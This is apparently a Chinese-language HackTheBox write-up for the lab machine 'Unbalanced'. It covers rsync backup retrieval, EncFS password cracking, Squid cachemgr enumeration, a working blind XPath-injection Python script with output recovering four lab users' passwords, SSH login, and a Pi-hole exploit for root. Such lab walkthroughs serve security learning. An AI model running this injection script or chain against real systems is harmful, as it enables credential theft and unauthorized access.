image-20200819143857114

recon:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 03:27 EDT
Nmap scan report for 10.10.10.200
Host is up (0.0041s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 a2:76:5c:b0:88:6f:9e:62:e8:83:51:e7:cf:bf:2d:f2 (RSA)
| 256 d0:65:fb:f6:3e:11:b1:d6:e6:f7:5e:c0:15:0c:0a:77 (ECDSA)
|_ 256 5e:2b:93:59:1d:49:28:8d:43:2c:c1:f7:e3:37:0f:83 (ED25519)
873/tcp open rsync (protocol version 31)
3128/tcp open http-proxy Squid http proxy 4.6
|_http-server-header: squid/4.6
|_http-title: ERROR: The requested URL could not be retrieved
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.10 seconds

入口点不是rsync就是squid,发现是在rsync

1
2
3
# root @ kali in ~/hackthebox/machines/unbalanced [5:02:36] 
$ rsync rsync://unbalanced.htb
conf_backups EncFS-encrypted configuration backups

把conf_backup给拖到本地

1
rsync -avzh rsync://unbalanced.htb/conf_backups ./conf_backups

文件名无规律,发现.encfs6.xml文件,用encfs加密的,key和salt都在xml文件里,用encfs2john.py将hash导出再用john破解出密码,然后用encfs解密文件

1
encfs /root/hackthebox/machines/unbalanced/conf_backups /root/hackthebox/machines/unbalanced/conf_backups_dec

重点关注squid.conf,squid的配置文件。太多注释行,vim里用/^[^#]过滤掉首字符是#的行,找到以下有用信息:

1
2
3
4
5
6
7
8
9
10
# Allow access to intranet
acl intranet dstdomain -n intranet.unbalanced.htb
acl intranet_net dst -n 172.16.0.0/12
http_access allow intranet
http_access allow intranet_net
# 以上指定了squid代理可以访问的内网地址范围,有一个intranet.unbalanced.htb的域名

cachemgr_passwd Thah$Sh1 menu pconn mem diskd fqdncache filedescriptors objects vm_objects counters 5min 60min histograms cbdata sbuf events
cachemgr_passwd disable all
#上面暴露了cachemgr_passwd

使用目标服务器的squid代理成功访问intranet.unbalanced.htb,并没有什么东西

使用squidclient和cachedmgr交互

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
# root @ kali in ~/hackthebox/machines/unbalanced [6:38:26] C:130
$ squidclient -h 10.10.10.200 -w 'Thah$Sh1' mgr:menu | grep protected
menu Cache Manager Menu protected
pconn Persistent Connection Utilization Histograms protected
mem Memory Utilization protected
diskd DISKD Stats protected
fqdncache FQDN Cache Stats and Contents protected
filedescriptors Process Filedescriptor Allocation protected
objects All Cache Objects protected
vm_objects In-Memory and In-Transit Objects protected
counters Traffic and Resource Counters protected
5min 5 Minute Average of Counters protected
60min 60 Minute Average of Counters protected
histograms Full Histogram Counts protected
cbdata Callback Data Registry Contents protected
sbuf String-Buffer statistics protected
events Event Queue protected

# root @ kali in ~/hackthebox/machines/unbalanced [6:38:30]
$ squidclient -h 10.10.10.200 -w 'Thah$Sh1' mgr:fqdncache
HTTP/1.1 200 OK
Server: squid/4.6
Mime-Version: 1.0
Date: Tue, 11 Aug 2020 10:38:50 GMT
Content-Type: text/plain;charset=utf-8
Expires: Tue, 11 Aug 2020 10:38:50 GMT
Last-Modified: Tue, 11 Aug 2020 10:38:50 GMT
X-Cache: MISS from unbalanced
X-Cache-Lookup: MISS from unbalanced:3128
Via: 1.1 unbalanced (squid/4.6)
Connection: close

FQDN Cache Statistics:
FQDNcache Entries In Use: 10
FQDNcache Entries Cached: 9
FQDNcache Requests: 5
FQDNcache Hits: 0
FQDNcache Negative Hits: 1
FQDNcache Misses: 4
FQDN Cache Contents:

Address Flg TTL Cnt Hostnames
127.0.1.1 H -001 2 unbalanced.htb unbalanced
10.10.14.36 N 052 0
::1 H -001 3 localhost ip6-localhost ip6-loopback
172.31.179.2 H -001 1 intranet-host2.unbalanced.htb
172.31.179.3 H -001 1 intranet-host3.unbalanced.htb
127.0.0.1 H -001 1 localhost
172.17.0.1 H -001 1 intranet.unbalanced.htb
ff02::1 H -001 1 ip6-allnodes
ff02::2 H -001 1 ip6-allrouters

注意看intranet-host2.unbalanced.htb对应内网ip是172.31.179.2,intranet-host3.unbalanced.htb对应ip是172.31.179.3,应该还有个intranet-host1.unbalanced.htb对应的是172.31.179.1

1
2
3
# root @ kali in ~/hackthebox/machines/unbalanced [6:40:04] 
$ curl -x 10.10.10.200:3128 http://172.31.179.1/
Host temporarily taken out of load balancing for security maintenance.

实际上http://172.31.179.1/intranet.php 与其他的网站一致,但是存在xpath injection https://websec.readthedocs.io/zh/latest/vuln/xpath.html

编写脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
import requests

fuzz = """0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~"""

password = ""

proxy = {
'http': 'http://unbalanced.htb:3128',
}

for name in ['rita','jim','bryan','sarah']:
password = ''
for i in range(1,30):
for j in fuzz:
check = "' or substring(Password,{},1)='{}' or '".format(i, j)
data = {'Username':name,'Password':check}
r = requests.post("http://172.31.179.1/intranet.php", proxies=proxy, data=data)
if "{}@unbalanced.htb".format(name) in r.text:
password1 = password + str(j)
print(password1)
break
if password == password1:
break
password = password1
print("{} {}".format(name,password))

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
# root @ kali in ~/hackthebox/machines/unbalanced [6:43:12] 
$ python injection.py
p
pa
pas
pass
passw
passwo
passwor
password
password0
password01
password01!
rita password01!
s
st
sta
stai
stair
stairw
stairwa
stairway
stairwayt
stairwayto
stairwaytoh
stairwaytohe
stairwaytohea
stairwaytoheav
stairwaytoheave
stairwaytoheaven
jim stairwaytoheaven
i
ir
ire
irea
ireal
ireall
ireally
ireallyl
ireallyl0
ireallyl0v
ireallyl0ve
ireallyl0veb
ireallyl0vebu
ireallyl0vebub
ireallyl0vebubb
ireallyl0vebubbl
ireallyl0vebubble
ireallyl0vebubbleg
ireallyl0vebubblegu
ireallyl0vebubblegum
ireallyl0vebubblegum!
ireallyl0vebubblegum!!
ireallyl0vebubblegum!!!
bryan ireallyl0vebubblegum!!!
s
sa
sar
sara
sarah
sarah4
sarah4e
sarah4ev
sarah4eva
sarah4evah
sarah sarah4evah

使用bryan : ireallyl0vebubblegum!!! 登陆ssh

本地跑了一个docker,运行着Pi-hole程序,找到exploit:https://www.exploit-db.com/exploits/48519

搞下来之后找到配置文件,用里面的密码登陆root就行了。